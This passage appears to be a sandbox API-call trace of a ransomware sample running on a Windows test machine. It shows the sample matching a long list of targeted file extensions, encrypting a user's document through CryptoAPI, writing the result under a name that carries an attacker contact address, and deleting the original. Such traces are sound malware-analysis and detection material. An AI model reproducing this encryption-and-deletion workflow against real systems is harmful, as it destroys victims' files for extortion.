(lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".odp") returned=".odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0186.750] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0186.751] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0186.751] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0186.754] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x4ab8, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x4ab8, lpOverlapped=0x0) returned 1
	[0186.758] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.758] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb198) returned 1
	[0186.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.762] CryptCreateHash (in: hProv=0xfcb198, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0186.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.762] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0186.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.762] CryptDeriveKey (in: hProv=0xfcb198, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0186.762] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.763] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x4ab8, dwBufLen=0x4ab8 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x4ac0) returned 1
	[0186.764] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.764] RtlMoveMemory (in: Destination=0xfe1c40, Source=0xfdd180, Length=0x4ab8 | out: Destination=0xfe1c40) 
	[0186.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.764] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe1c40*, pdwDataLen=0x18bc0c*=0x4ab8, dwBufLen=0x4ac0 | out: pbData=0xfe1c40*, pdwDataLen=0x18bc0c*=0x4ac0) returned 1
	[0186.764] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.765] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0186.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.765] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0186.765] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.765] CryptReleaseContext (hProv=0xfcb198, dwFlags=0x0) returned 1
	[0186.765] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.766] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0186.766] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0186.766] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0186.768] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 97
	[0186.768] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0186.768] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe1c40*, nNumberOfBytesToWrite=0x4ac0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe1c40*, lpNumberOfBytesWritten=0x18c068*=0x4ac0, lpOverlapped=0x0) returned 1
	[0186.772] CloseHandle (hObject=0x2c0) returned 1
	[0186.772] CloseHandle (hObject=0x384) returned 1
	[0186.772] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp")) returned 1
	[0186.779] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\vnt7g2bfzefn4rcpt3r.odp")) returned 0
	[0186.780] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed19060, ftCreationTime.dwHighDateTime=0x1d92039, ftLastAccessTime.dwLowDateTime=0xbed4be60, ftLastAccessTime.dwHighDateTime=0x1d95e23, ftLastWriteTime.dwLowDateTime=0xbed4be60, ftLastWriteTime.dwHighDateTime=0x1d95e23, nFileSizeHigh=0x0, nFileSizeLow=0x16468, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wC7c7GIL2.pptx", cAlternateFileName="WC7C7G~1.PPT")) returned 1
	[0186.780] lstrcmpW (lpString1="wC7c7GIL2.pptx", lpString2="..") returned 1
	[0186.780] lstrcmpW (lpString1="wC7c7GIL2.pptx", lpString2=".") returned 1
	[0186.780] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0186.780] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="wC7c7GIL2.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\wC7c7GIL2.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\wC7c7GIL2.pptx"
	[0186.780] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\wC7c7GIL2.pptx") returned 46
	[0186.780] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0186.781] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\wC7c7GIL2.pptx", cchLength=0x2e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx") returned 0x2e
	[0186.781] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.781] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0186.781] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx"
	[0186.781] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\wc7c7gil2.pptx") returned 46
	[0186.781] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0186.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.782] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0186.782] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0186.782] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.